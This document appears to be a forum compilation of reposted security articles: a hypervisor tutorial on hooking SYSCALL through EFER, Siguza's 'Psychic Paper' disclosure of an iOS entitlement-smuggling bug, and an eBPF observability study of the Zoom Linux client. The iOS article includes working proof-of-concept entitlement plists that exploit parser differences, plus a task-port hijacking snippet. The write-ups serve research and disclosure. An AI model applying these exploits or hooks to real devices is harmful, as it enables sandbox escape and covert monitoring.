Ss.Selector = (UINT16)(((MsrValue >> 48) + 8) | 3); // (STAR[63:48]+8) | 3 (* RPL forced to 3 *) Ss.Base = 0; // Flat segment Ss.Limit = (UINT32)~0; // 4GB limit Ss.Attributes = 0xCF3; // G+DB+P+S+DPL3+Data VmcsWriteSegment( X86_REG_SS, &Ss ); return TRUE; } You can simply call the SYSCALL and SYSRET emulation routines from your #UD handler, which also does the detection of what instruction caused the exception. Here is a quick example including code supporting KVAS: #define IS_SYSRET_INSTRUCTION(Code) \ (*((PUINT8)(Code) + 0) == 0x48 && \ *((PUINT8)(Code) + 1) == 0x0F && \ *((PUINT8)(Code) + 2) == 0x07) #define IS_SYSCALL_INSTRUCTION(Code) \ (*((PUINT8)(Code) + 0) == 0x0F && \ *((PUINT8)(Code) + 1) == 0x05) static BOOLEAN VmmpHandleUD( IN PVIRTUAL_CPU VirtualCpu ) { UINTN GuestCr3; UINTN OriginalCr3; UINTN Rip = VirtualCpu->Context->Rip; // // Due to KVA Shadowing, we need to switch to a different directory table base // if the PCID indicates this is a user mode directory table base. // GuestCr3 = VmxGetGuestControlRegister( VirtualCpu, X86_CTRL_CR3 ); if ((GuestCr3 & PCID_MASK) != PCID_NONE) { OriginalCr3 = ReadCr3( ); WriteCr3( PsGetCurrentProcess( )->DirectoryTableBase ); if (IS_SYSRET_INSTRUCTION( Rip )) { WriteCr3( OriginalCr3 ); goto EmulateSYSRET; } if (IS_SYSCALL_INSTRUCTION( Rip )) { WriteCr3( OriginalCr3 ); goto EmulateSYSCALL; } WriteCr3( OriginalCr3 ); return FALSE; } else { if (IS_SYSRET_INSTRUCTION( Rip )) goto EmulateSYSRET; if (IS_SYSCALL_INSTRUCTION( Rip )) goto EmulateSYSCALL; return FALSE; } // // Emulate SYSRET instruction. // EmulateSYSRET: LOG_DEBUG( "SYSRET instruction => 0x%llX", Rip ); return VmmpEmulateSYSRET( VirtualCpu ); // // Emulate SYSCALL instruction. // EmulateSYSCALL: LOG_DEBUG( "SYSCALL instruction => 0x%llX", Rip ); return VmmpEmulateSYSCALL( VirtualCpu ); } If it has been determined that a SYSCALL or SYSRET instruction has caused the #UD exception, then just skip injecting the exception into the guest as the exception has been caused intentionally, and resume back to the guest gracefully. Example: case X86_TRAP_UD: // INVALID OPCODE FAULT LOG_DEBUG( "VMX => #UD Rip = 0x%llX", VirtualCpu->Context->Rip ); // // Handle the #UD, checking if this exception was intentional. // if (!VmmpHandleUD( VirtualCpu )) { // // If this #UD was found to be unintentional, inject a #UD interruption into the guest. // VmxInjectInterruption( VirtualCpu, InterruptVectorType, VMX_INTR_NO_ERR_CODE ); } // continued code flow then return back to guest.... So how can we use this effectively? Well in the SYSCALL emulation handler, we have access to the guest registers which contains the system call index, and associated parameters according to the x64 ABI in use, so we have free reign to do whatever we want with this! Copyright protected by Digiprove © 2019All Rights Reserved Sursa: https://revers.engineering/syscall-hooking-via-extended-feature-enable-register-efer/
-
psychicpaper Siguza, 01. May 2020 “Psychic Paper” These aren’t the droids you’re looking for. 0. Introduction Yesterday Apple released iOS 13.5 beta 3 (seemingly renaming iOS 13.4.5 to 13.5 there), and that killed one of my bugs. It wasn’t just any bug though, it was the first 0day I had ever found. And it was probably also the best one. Not necessarily for how much it gives you, but certainly for how much I’ve used it for, and also for how ridiculously simple it is. So simple, in fact, that the PoC I tweeted out looks like an absolute joke. But it’s 100% real. I dubbed it “psychic paper” because, just like the item by that name that Doctor Who likes to carry, it allows you get past security checks and make others believe you have a wide range of credentials that you shouldn’t have. In contrast to virtually any other bug and any other exploit I’ve had to do with, this one should be understandable without any background knowledge in iOS and/or exploitation. In that spirit, I’ll also try and write this post in a manner that assumes no iOS- or exploitation-specific knowledge. I do expect you however to loosely know what XML, public key encryption and hashes are, and understanding C code is certainly a big advantage. So strap in for the story of what I’ll boldly claim to be the most elegant exploit for the most powerful sandbox escape on iOS yet. 1. Background 1.1 Technical background As a first step, let’s look at a sample XML file: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE figment-of-my-imagination> <container> <meow>value</meow> <whatever/> </container> <!-- herp --> <idk a="b" c="d">xyz</idk> The basic concept is that <tag> opens a tag, </tag> closes it, and stuff goes in between. That stuff can be either raw text or more tags. Empty tags can be self-closing like <tag/>, and they can have attributes like a="b" as well, yada yada. There’s three things in the above file that go beyond just basic tags: <?...?> - Tags starting and ending with question marks, so-called “processing instructions”, are treated specially. <!DOCTYPE ...> - Tags starting with !DOCTYPE are, well, “document type declarations” and are treated specially as well. <!-- --> - Tags starting with <!-- and ending with --> are comments, and they plus their contents are ignored. The full XML specification contains a lot more, but a) that’s irrelevant to us, and b) nobody should ever be forced to read that. Now, XML is horrible to parse for reasons this XKCD illustrates beautifully: So yeah, you can construct <mis>matched</tags>, <attributes that="are never closed>, even <tags that are never closed, maybe a tag like this: <!>, the list simply doesn’t end. This makes XML a format that’s excruciatingly hard to parse correctly, which will become relevant in a bit. Now building on XML, we have “property list”, or “plist” for short: yet another general-purpose format for storing serialised data. You have arrays, dictionaries with key -> value pairs, strings, numbers, etc. Plist files exist in a bunch of different forms, but the only two that you’ll realistically see in an Apple ecosystem are the “bplist” binary format that are out of scope for this post, and the XML-based format. A valid XML plist can look something like this: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>OS Build Version</key> <string>19D76</string> <key>IOConsoleLocked</key> <false/> <!-- abc --> <key>IOConsoleUsers</key> <array> <dict> <key>kCGSSessionUserIDKey</key> <integer>501</integer> <key>kCGSessionLongUserNameKey</key> <string>Siguza</string> </dict> </array> <!-- def --> <key>IORegistryPlanes</key> <dict> <key>IODeviceTree</key> <string>IODeviceTree</string> <key>IOService</key> <string>IOService</string> </dict> </dict> </plist> Plist files are used all throughout iOS and macOS for configuration files, package properties, and last but not least as part of code signatures. So: code signatures. When a binary wants to run on iOS, a kernel extension called AppleMobileFileIntegrity (or “AMFI”) requires it to have a valid code signature, or else it will be killed on the spot. What this code signature looks like isn’t important for us, all that matters is that it is identified by a hashsum. This hash can be validated in one of two ways: It can be known to the kernel ahead of time, which is called an “ad-hoc” signature. This is used for iOS system apps and daemons, and the hash is simply checked against a collection of known hashes directly in the kernel. It needs to be signed with a valid code signing certificate. This is used for all 3rd party apps, and in this scenario, AMFI calls out to the userland daemon amfid to have it run all the necessary checks. Now, code signing certificates come in two forms: The App Store certificate. This is held only by Apple themselves and in order to get signed this way, your app needs to pass the App Store review. Developer certificates. This can be the free “7-day” certificates, “regular” developer certificate, or enterprise distribution certificates. In the latter case, the app in question will also require a “provisioning profile”, a file that Xcode (or some 3rd party software) can fetch for you, and that needs to be placed in your App.ipa bundle at Payload/Your.app/embedded.mobileprovision. This file is signed by Apple themselves, and specifies the duration, the list of devices, and the developer accounts it is valid for, as well as all the restrictions that should apply to the app. And now a quick look at app sandboxing and security boundaries: In a standard UNIX environment, pretty much the only security boundaries you get are UID checks. Processes of one UID can’t access resources of another UID, and any resource deemed “privileged” requires UID 0, i.e. “root”. iOS and macOS still use that, but also introduce the concept of “entitlements”. In layman’s terms, entitlements are a list of properties and/or privileges that should be applied to your binary. If present, they are embedded in the code signature of your binary, in the form of a XML plist file, which might look like this: <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>task_for_pid-allow</key> <true/> </dict> </plist> This would mean that the binary in question “holds the task_for_pid-allow entitlement”, which in this specific case means is allowed to use the task_for_pid() mach trap, which is otherwise not allowed at all (at least on iOS). Such entitlements are checked all throughout iOS and macOS and there’s well upwards of a thousand different ones in existence (Jonathan Levin has built a big catalogue of all the ones he could find, if you’re curious). The important thing is just that all 3rd party apps on iOS are put in a containerised environment where they have access to as few files, services and kernel APIs as possible, and entitlements can be used to poke holes in that container, or remove it entirely. This presents an interesting problem. With iOS system apps and daemons, Apple is the one signing them, so they wouldn’t put any entitlements on there that they don’t want the binaries to have. The same goes for App Store apps, where Apple is the one creating the final signature. But with developer certificates, the signature on the binary is created by the developers themselves, and Apple merely signs the provisioning profile. This means that the provisioning profile must create a list of allowed entitlements, or the iOS security model is toast right away. And indeed, if you run strings against a provisioning profile, you will find something like this: <key>Entitlements</key> <dict> <key>keychain-access-groups</key> <array> <string>YOUR_TEAM_ID.*</string> </array> <key>get-task-allow</key> <true/> <key>application-identifier</key> <string>YOUR_TEAM_ID.com.example.app</string> <key>com.apple.developer.team-identifier</key> <string>YOUR_TEAM_ID</string> </dict> Compared to the over-1000 entitlements in existence, this list is extremely short, with the only two functional entitlements being keychain-access-groups (related to credentials) and get-task-allow (allowing your app to be debugged). Not a whole lot to work with. 1.2 Historical background Back in fall 2016 I wrote my first kernel exploit, which was based on the infamous “Pegasus vulnerabilities”. Those were memory corruptions in the XNU kernel in a function called OSUnserializeBinary, which is a subordinate of another function called OSUnserializeXML. These two functions are used to parse not exactly XML data, but rather plist data - they are the way of parsing plist data in the kernel. Now given the vulnerabilities I had just written an exploit for, and the still janky-looking code those two functions consisted of, in January 2017 I began looking through them in the hopes of finding further memory corruption bugs. At the same time, I was in the process of figuring out how to build an iOS app without Xcode. Partly because I wanted to understand what’s really going on under the hood, and partly because I just hate GUIs for development, especially when you Google how to do something, and the answer is a series of 17 “click here and there”s that are no longer valid because all the GUI stuff moved somewhere else in the last update. So I was getting a provisioning profile via Xcode every 7 days, I’d build the binary of my app manually with xcrun -sdk iphoneos clang, I’d sign it myself with codesign, and I’d install it myself with libimobiledevice’s ideviceinstaller. It was this combination, as well as probably a good portion of dumb luck that made me discover the following bug, and excitedly tweet about it: (Thanks for digging that up, Emma! :D) 2. The bug In an informal sense, it’s clear what it means for a binary to hold an entitlement. But how do you formally specify that? What would code look like that takes as input a process handle and an entitlement name and just returned a boolean saying whether the process does or does not have that entitlement? Luckily for us, XNU has precisely such a function in iokit/bsddev/IOKitBSDInit.cpp: extern "C" boolean_t IOTaskHasEntitlement(task_t task, const char * entitlement) { OSObject * obj; obj = IOUserClient::copyClientEntitlement(task, entitlement); if (!obj) { return false; } obj->release(); return obj != kOSBooleanFalse; } The lion’s share of the work here is done by these two functions though, from iokit/Kernel/IOUserClient.cpp: OSDictionary* IOUserClient::copyClientEntitlements(task_t task) { #define MAX_ENTITLEMENTS_LEN (128 * 1024) proc_t p = NULL; pid_t pid = 0; size_t len = 0; void *entitlements_blob = NULL; char *entitlements_data = NULL; OSObject *entitlements_obj = NULL; OSDictionary *entitlements = NULL; OSString *errorString = NULL; p = (proc_t)get_bsdtask_info(task); if (p == NULL) { goto fail; } pid = proc_pid(p); if (cs_entitlements_dictionary_copy(p, (void **)&entitlements) == 0) { if (entitlements) { return entitlements; } } if (cs_entitlements_blob_get(p, &entitlements_blob, &len) != 0) { goto fail; } if (len <= offsetof(CS_GenericBlob, data)) { goto fail; } /* * Per <rdar://problem/11593877>, enforce a limit on the amount of XML * we'll try to parse in the kernel. */ len -= offsetof(CS_GenericBlob, data); if (len > MAX_ENTITLEMENTS_LEN) { IOLog("failed to parse entitlements for %s[%u]: %lu bytes of entitlements exceeds maximum of %u\n", proc_best_name(p), pid, len, MAX_ENTITLEMENTS_LEN); goto fail; } /* * OSUnserializeXML() expects a nul-terminated string, but that isn't * what is stored in the entitlements blob. Copy the string and * terminate it. */ entitlements_data = (char *)IOMalloc(len + 1); if (entitlements_data == NULL) { goto fail; } memcpy(entitlements_data, ((CS_GenericBlob *)entitlements_blob)->data, len); entitlements_data[len] = '\0'; entitlements_obj = OSUnserializeXML(entitlements_data, len + 1, &errorString); if (errorString != NULL) { IOLog("failed to parse entitlements for %s[%u]: %s\n", proc_best_name(p), pid, errorString->getCStringNoCopy()); goto fail; } if (entitlements_obj == NULL) { goto fail; } entitlements = OSDynamicCast(OSDictionary, entitlements_obj); if (entitlements == NULL) { goto fail; } entitlements_obj = NULL; fail: if (entitlements_data != NULL) { IOFree(entitlements_data, len + 1); } if (entitlements_obj != NULL) { entitlements_obj->release(); } if (errorString != NULL) { errorString->release(); } return entitlements; } OSObject* IOUserClient::copyClientEntitlement(task_t task, const char * entitlement ) { OSDictionary *entitlements; OSObject *value; entitlements = copyClientEntitlements(task); if (entitlements == NULL) { return NULL; } /* Fetch the entitlement value from the dictionary. */ value = entitlements->getObject(entitlement); if (value != NULL) { value->retain(); } entitlements->release(); return value; } So we have a reference implementation for entitlement checks, and it’s backed by OSUnserializeXML. Great! …or is it? A very interesting thing about this bug is that I couldn’t point you at any particular piece of code and say “there’s my bug”. The reason for that is that, of course, iOS doesn’t have just one, or two, or even three plist parsers, it has at least four! These are: OSUnserializeXML in the kernel IOCFUnserialize in IOKitUser CFPropertyListCreateWithData in CoreFoundation xpc_create_from_plist in libxpc (closed-source) So the three interesting questions that arise from this are: Which parsers are used to parse entitlements? Which parser does amfid use? And do all parsers return the same data? The answer to 1) is “all of them”, and to 2) CFPropertyListCreateWithData. And as a few folks on Twitter already figured out after my tweet, the answer to 3) is obviously “lolnope”. Because it’s very hard to parse XML correctly, valid XML makes all parsers return the same data, but slightly invalid XML makes them return just slightly not the same data. In other words, any parser difference can be exploited to make different parsers see different things. This is the very heart of this bug, making it not just a logic flaw, but a system-spanning design flaw. Before we move on to exploiting this, I would like to note that in all my tests, OSUnserializeXML and IOCFUnserialize always returned the same data, so for the rest of this post I will consider them as equivalent. For brevity, I will also be dubbing OSUnserializeXML/IOCFUnserialize “IOKit”, CFPropertyListCreateWithData “CF”, and xpc_create_from_plist “XPC”. 3. The exploit Let’s start with the variant of the PoC I tweeted out, which is perhaps the most elegant way of exploiting this bug: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <!-- these aren't the droids you're looking for --> <!---><!--> <key>platform-application</key> <true/> <key>com.apple.private.security.no-container</key> <true/> <key>task_for_pid-allow</key> <true/> <!-- --> </dict> </plist> The interesting tokens here are <!---> and <!-->, which, as per my understanding of the XML specification, are not valid XML tokens. Nonetheless, IOKit, CF and XPC all accept the above XML/plist… just not exactly in the same way. I wrote a little tool called plparse that I have so far been reluctant to open-source because it emphasises the fact that there exist multiple plist parsers in iOS, and that they certainly don’t all work the same. It takes an input file and any combination of -c, -i and -x args to parse the file with the CF, IOKit and XPC engines respectively. Running on the above file, we get: % plparse -cix ent.plist { } { task_for_pid-allow: true, platform-application: true, com.apple.private.security.no-container: true, } { com.apple.private.security.no-container: true, platform-application: true, task_for_pid-allow: true, } The output is a lazy JSON-like format, but you get the gist of it. At the top is CF, followed by IOKit, and finally XPC. This means that when we slap the above entitlements file on our app (plus app identifier that we need and such) and amfid uses CF to check whether we have any entitlements that the provisioning profile doesn’t allow, it doesn’t see any. But then when the kernel or some daemon wants to check whether we’re allowed to do Fun Stuff™, they see we have all the permissions for it! So how does this specific example work? This is the comment tag handling code of CF (the relevant one anyway, there are multiple): case '!': // Could be a comment if (pInfo->curr+2 >= pInfo->end) { pInfo->error = __CFPropertyListCreateError(kCFPropertyListReadCorruptError, CFSTR("Encountered unexpected EOF")); return false; } if (*(pInfo->curr+1) == '-' && *(pInfo->curr+2) == '-') { pInfo->curr += 2; skipXMLComment(pInfo); } else { pInfo->error = __CFPropertyListCreateError(kCFPropertyListReadCorruptError, CFSTR("Encountered unexpected EOF")); return false; } break; // ... static void skipXMLComment(_CFXMLPlistParseInfo *pInfo) { const char *p = pInfo->curr; const char *end = pInfo->end - 3; // Need at least 3 characters to compare against while (p < end) { if (*p == '-' && *(p+1) == '-' && *(p+2) == '>') { pInfo->curr = p+3; return; } p ++; } pInfo->error = __CFPropertyListCreateError(kCFPropertyListReadCorruptError, CFSTR("Unterminated comment started on line %d"), lineNumber(pInfo)); } And this is the comment tag handling code of IOKit: if (c == '!') { c = nextChar(); bool isComment = (c == '-') && ((c = nextChar()) != 0) && (c == '-'); if (!isComment && !isAlpha(c)) { return TAG_BAD; // <!1, <!-A, <!eos } while (c && (c = nextChar()) != 0) { if (c == '\n') { state->lineNumber++; } if (isComment) { if (c != '-') { continue; } c = nextChar(); if (c != '-') { continue; } c = nextChar(); } if (c == '>') { (void)nextChar(); return TAG_IGNORE; } if (isComment) { break; } } return TAG_BAD; } As can be seen, IOKit checks for the !-- chars, and then correctly advances the pointer by three chars before seeing ->, which doesn’t end the comment. CF on the other hand only advances the pointer by two chars, so it parses the second - twice, thus seeing both <!-- and -->. This means that while IOKit considers <!---> as just the start of a comment, CF considers it as both start and end. After that, we feed both parsers the <!--> token, which is now too short to be interpreted as a full comment by either of them. However, the difference in states (in a comment vs. not in a comment) causes a very interesting behaviour: if we’re currently inside a comment, both parsers see the --> ending a comment, otherwise they both just see the <!-- starting one. Overall, this means: <!---> CF sees these bits <!--> IOKit sees these bits <!-- --> After discovering this, I didn’t bother reversing XPC, I simply fed it some test data and observed the results. In this case, it turned out to see the same things as IOKit, which was perfect for my case. I could sneak entitlements past amfid using CF, but have them show up when parsed by both IOKit and XPC! There’s a couple more variants I tested, with varying results: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict hurr="> </dict> </plist> "> <key>task_for_pid-allow</key> <true/> </dict> </plist> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <???><!-- ?> <key>task_for_pid-allow</key> <true/> <!-- --> </dict> </plist> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE [%> <plist version="1.0"> <dict> <key>task_for_pid-allow</key> <true/> </dict> </plist> ;]> <plist version="1.0"> <dict> </dict> </plist> These are all less elegant and less rewarding than the first variant, and I’ll leave it as an exercise to the reader to figure out what parser difference causes those, or how the different parsers react to them. One thing to note here though is that, depending on what you use to install IPA files on your iDevice, getting these entitlements to survive that process can be tricky. That is because the entitlements on a provisioned app also contain a team- and app identifier, which at least Cydia Impactor generates randomly every time you sign, and thus has to parse, modify and re-generate the entitlements blob. I don’t know about any of its alternatives, but I’ve been told Xcode works fine with such entitlements, and the manual variant of codesign+ideviceinstaller certainly does as well. 4. Escaping the sandbox From this point forward, it’s simply a matter of picking entitlements. For a start, we can give ourselves the three entitlements in my initial PoC: com.apple.private.security.no-container - This prevents the sandbox from applying any profile to our process whatsoever, meaning we can now read from and write to any location the mobile user has access to, execute a ton of syscalls, and talk to many hundreds of drivers and userland services that we previously weren’t allowed to. And as far as user data goes, security no longer exists. task_for_pid-allow - Just in case the file system wasn’t enough, this allows us to look up the task port of any process running as mobile, which we can then use to read and write process memory, or directly get or set thread register states. platform-application - Normally we would be marked as a non-Apple binary and not be allowed to perform the above operations on task ports of Apple binaries, but this entitlement marks us as a genuine, mint-condition Cupertino Cookie. And just in case this entitlement magic wasn’t enough, say we needed to pretend to CF that we have certain entitlements as well, we could easily do that with the three above ones now. All we have to do is find a binary that holds the entitlement(s) we want, posix_spawn it in suspended state, get the newly created process’ task port, and make it do our bidding: task_t haxx(const char *path_of_executable) { task_t task; pid_t pid; posix_spawnattr_t att; posix_spawnattr_init(&att); posix_spawnattr_setflags(&att, POSIX_SPAWN_START_SUSPENDED); posix_spawn(&pid, path_of_executable, NULL, &att, (const char*[]){ path_of_executable, NULL }, (const char*[]){ NULL }); posix_spawnattr_destroy(&att); task_for_pid(mach_task_self(), pid, &task); return task; } You can further get some JIT entitlements to dynamically load or generate code, you can spawn a shell, or any of literally a thousand other things. There are a mere two privileges this bug does not give us: root and kernel. But for both of those, our available attack surfaces just increased a hundredfold, and I would argue that going to root isn’t even worth it, because you might as well go straight for the kernel. But I hope you will understand, dear reader, that losing one 0day is loss enough for me, so of course escalating past “mobile with every entitlement ever” is left as an exercise to you. 5. The patch Given the elusive nature of this bug, how did Apple ultimately patch it? Obviously there could only be one way: by introducing MORE PLIST PARSERS!!!one! In iOS 13.4 already, Apple hardened entitlement checks somewhat, due to a bug report credited to Linus Henze: AppleMobileFileIntegrity Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: An application may be able to use arbitrary entitlements Description: This issue was addressed with improved checks. CVE-2020-3883: Linus Henze (pinauten.de) While I don’t know the exact details of that bug, based on a tweet of Linus I’m assuming this had to do with bplist, which, while also exploiting parser differences, wouldn’t have gotten past amfid. And my bug actually survived the 13.4 fix, but was finally killed in 13.5 beta 3. I also don’t know whether it was Linus, Apple or someone else who went on to look for more parser differences, but having two entitlement bugs fixed in two consecutive minor iOS releases feels like too much of a coincidence, so I’m strongly assuming whoever it was drew inspiration from Linus’ bug. Apple’s final fix consists of introducing a new function called AMFIUnserializeXML, which is pasted into both AMFI.kext and amfid, and is used to compare against the results of OSUnserializeXML and CFPropertyListCreateWithData to make sure they are the same. You can still include a sequence like <!---><!--><!-- --> in your entitlements and it will go through, but try and sneak anything in between those comments, and AMFI will tear your process to shreds and report to syslog: AMFI: detected an anomaly during entitlement parsing. So while this does technically bump the number of XML/plist parsers from 4 to 6, it does sadly actually mitigate my bug. 6. Conclusion As far as first 0days go, I couldn’t have wished for a better one. This single bug has assisted me in dozens of research projects, was used thousands of times every year, and has probably saved me just as many hours. And the exploit for it is in all likelihood the most reliable, clean and elegant one I’ll ever write in my entire life. And it even fits in a tweet!! Well over 3 years since discovery is not half bad for such a bug, but I sure would’ve loved to keep it another decade or two, and I know I’ll dearly miss it in the time to come. We can also ask ourselves how a bug like that could ever exist. Why the hell there are 4 different plist parsers on iOS. Why we are still using XML even. But I figure those are more philosophical than technical in nature. And while this entire story shows that it might be a good idea to periodically ask ourselves whether the inaccuracies of our mental models are acceptable, or something should be documented and communicated more thoroughly, I really can’t accuse Apple of much here. Bugs like these are probably among the hardest to spot, and I have truly no idea how the hell I was able to find it while so many others didn’t. Now, I’ve pumped this post out as soon as I possibly could, so if I’ve left any mistake in here, you have any questions, or just wanna chat in general, feel free to file an issue, hit me up on Twitter, or shoot me an email at *@*.net where * = siguza. At the time of writing, this bug is still present on the latest non-beta version of iOS. The whole project is available on GitHub, have fun with it while it lasts! And finally, some of the reactions I got of Twitter for all of you to enjoy: Sursa: https://siguza.github.io/psychicpaper/
-
Zooming in on Observability by Peter Parkanyi MAY 1, 2020FILED UNDER: CORONAVIRUS CYBERSECURITY LABS WORK @ RED SIFT Zoom has been under scrutiny lately, for a lot of good reasons. Since their product has quickly escalated to being a public critical infrastructure, we decided to play around with our observability stack to see how the Zoom Linux client actually works, and how the different pieces help us with analysis. This write-up is about using eBPF for research and blackbox testing, and provides hands-on examples using ingraind and RedBPF. Our intent was to see how far we can push eBPF in this domain, while also demonstrating some of the amazing engineering behind Zoom. ingraind and RedBPF At Red Sift, we developed ingraind, our security observability agent for our cloud, based on Rust and eBPF using RedBPF. This means we can gather run-time information about arbitrary system processes and containers to validate if they are doing anything nefarious in our cloud, who do they talk to, and which files they access. However, the cloud is just a fancy word for someone else’s computer, and ingraind runs perfectly fine on my laptop, too. So we fired up ingraind to monitor our daily Zoom “standup” meeting, and decided to analyse the results in this blog post. We then deviated a little, and ended up writing some Rust code that helps us decrypt TLS traffic by instrumenting the binary using eBPF uprobes. Let’s dig in, first look at the binary, then the results. At the end of the post, I share the configuration file that I used. First look To get a basic idea of what to expect, I looked at the zoom binary using strings, and quickly found some pinned certificates for *.zoomgov.com, *.zoom.us, and mentions of xmpp.zoomgov.com. This is great! The binary is stripped, however, some debug symbols are there for the dependency libraries, not the proprietary code. The directory also contains the Qt library, and a few other standard open source bits and pieces. Interestingly, the package comes with a wrapper shell script zoom.sh that manages core dumps. Network traffic analysis The most interesting thing I wanted to see was how Zoom handles network traffic. I expected at least a partially peer to peer setup with many participants, instead I found that only a handful of IP ranges were used during any call. Most interestingly, one call about two weeks ago showed some amount of TCP traffic hitting a broadcast IP address that ends with .255. My recent tests showed a larger number of individual IPs within a few different IP blocks, but the client version was the same. This is how I found out that Zoom actually operates their own ISP, which strikes as an ingenious way of managing the amount of traffic they have to deal with. Zoom reaches out to Google’s CDN to fetch the images for the user profiles who are logged in with Google’s SSO. I suspect the same is true for participants who use Facebook logins, but I didn’t see any activity towards Facebook’s ranges. Another thing that’s interesting to see is that there is a dedicated thread for networking. I can only hope that this means there is at least some sort of privilege separation, but I did not do syscall analysis this time. File access patterns The list of files Zoom touched using my call was nothing surprising. Apart from the usual X libraries, and the dependencies they ship, they maintain a local configuration file, and access PulseAudio-related resources on the file system. Stripping out the boring bits leaves us with this: $ rg '"process_str":"zoom.*"' zoom_file.log |jq '.tags.path_str' |sort |uniq ... "etc/ca-certificates/extracted/tls-ca-bundle.pem" ... "p2501/.config/zoomus.conf" "p2501/.local/share/fonts/.uuid" "p2501/.Xauthority" "p2501/.zoom/data/conf_avatar_045a3a19053421428ff" "p2501/.zoom/data/conf_avatar_763f5840c57564bca16" "p2501/.zoom/data/conf_avatar_7cdb80036953ea86e83" "p2501/.zoom/data/conf_avatar_9426e77c9128d50079d" "p2501/.zoom/data/conf_avatar_aa2a71a3e0a424e451b" "p2501/.zoom/data/conf_avatar_b46ff5ad22374cdd56d" "p2501/.zoom/data/conf_avatar_b61879be31e3fce14ee" "p2501/.zoom/data/conf_avatar_c29cc2bde8058cb0093" "p2501/.zoom/data/conf_avatar_e3ef3d0218f29d518dd" "p2501/.zoom/data/conf_avatar_e8dc9d76cae1c2a5f3e" "p2501/.zoom/data/conf_avatar_ef7b17310c83f908b39" "p2501/.zoom/data/conf_avatar_f26b44b634fceb21d7e" "p2501/.zoom/data/conf_avatar_f28df485f9132b47c75" "p2501/.zoom/data/zoommeeting.db" "p2501/.zoom/data/zoomus.db" "p2501/.zoom/data/zoomus.tmp.db" ... The local cache of avatars is certainly a good call. As we’ve seen above, Zoom downloads the avatars from Google if the user is logged in through the single sign-on service, and it makes sense to maintain a local cache of these. The files are PNGs and JPEGs, and I have found pictures of people I do not recognise, so it looks like there’s no automatic cleanup. The local databases are more interesting. They are SQLite databases that seem to contain not much information at all. There is no local copy of conversations or chats. However, the access to the TLS CA bundle is a bit baffling given the pinning certificates in the binary, but I suspect one of the linked libraries might be auto-loading this store. Accessing the unencrypted data For this, we had to bring out the big guns, uprobes, so I’ll hand it over to Alessandro. As discovered by Peter looking at the network connections logged by ingraind, Zoom uses Transport Layer Security (TLS) to secure some of its connections. There are several libraries that can be used by applications to implement TLS, including the popular OpenSSL, LibreSSL, BoringSSL, NSS etc. Having recently implemented uprobes support for RedBPF, I thought it could be fun to try and use it to hook into whatever library Zoom uses to implement TLS and intercept the unencrypted data. Uprobes allow you to instrument user space code by attaching to arbitrary addresses inside a running program. I’m planning to talk about uprobes in a separate post, for the moment it suffices to know that the API to attach custom code to a running program is the following: pub fn attach_uprobe( &mut self, fn_name: Option<&str>, offset: u64, target: &str, pid: Option<pid_t>, ) -> Result<()>; attach_uprobe() parses the target binary or library, finds the function fn_name, and injects the BPF code at its address. If offset is not zero, its value is added to the address of fn_name. If fn_name is None, offset is interpreted as an offset from the start of the target’s .text section. Finally if a pid is given, the custom code will only run for the target loaded by the program with the given pid. While doing this is certainly possible on a running process, it is a bit of a rabbit hole. Instrumenting Zoom to access decrypted data turned out to be a challenge, but ad-hoc attaching to existing processes within your control should be easily possible using this infrastructure. Findings Based on the data we’ve been able to collect with ingraind, there are no screaming issues we’ve found. It is certainly good to see the Zoom app uses pinned certificates, and that they do not keep logs of the messaging history, even as a side-effect. Using a Qt-based app is a great way to balance performance and security for a cross-platform audience. On top of that, it was really interesting to see how the infrastructure works in action, with connections going to over 100 target IPs in a few blocks, during a single call, being routed through Zoom’s ISP. I highlighted that they keep a cache of profile pictures from Google accounts. This seems futile as Zoom hits Google’s CDN whenever somebody with a Google account joins. Test setup To make sure we were looking at the right traffic and only picked up on Zoom’s DNS queries, I made sure that nothing else was running during the call but the Zoom Linux client. We used the following ingraind config to monitor the system during a Zoom call. [[probe]] pipelines = ["console"] [probe.config] type = "Network" [[probe]] pipelines = ["console"] [probe.config] type = "DNS" interface = "wlp61s0" [[probe]] pipelines = ["console"] [probe.config] type = "Files" monitor_dirs = ["/usr/bin"] [[probe]] pipelines = ["console"] [probe.config] type = "TLS" interface = "wlp61s0" [[pipeline.console.steps]] type = "Container" [[pipeline.console.steps]] type = "Buffer" interval_s = 1 enable_histograms = false [pipeline.console.config] backend = "Console" Using this config, we can redirect all the output into a file and use command line tools like ripgrep, and jq to process the results for a superficial look. Let’s take a look at the config file piece by piece. [probe.config] type = "Network" The Network probe enable network traffic analysis. This means we get low level information on every read and write on a network socket, whether TCP, UDP, v4 or v6. [probe.config] type = "DNS" interface = "wlp61s0" The DNS probe collects incoming DNS traffic data. Incoming DNS traffic also includes DNS answers, so we will know exactly what our queries are and what they resolve to, even if an application chooses to craft the packets themselves and bypass the gethostbyname(3) libc call. Due to an implementation details, we need to specify the network interface, which, using systemd, looks a bit ugly. [probe.config] type = "Files" monitor_dirs = ["/"] The file probe gives us information about file read/write events that happen in a directory. For monitoring Zoom, I decided I want to see all filesystem activity, so anything that happens under / will show up in my logs. Most applications tend to show fairly conservative access patterns after the loader caters for all the dynamic dependencies, and this is what I expect here, too. [probe.config] type = "TLS" interface = "wlp61s0" I want to see the details of TLS connections. Since we know Zoom uses certificate pinning, it will be interesting to see the properties and cipher suits the connections actually use. [[pipeline.console.steps]] type = "Container" This is a long shot, but we would be able to pick up cgroup information using the Container post-processor. I didn’t pick up any cgroup information, though, so there’s no network-facing sandbox. 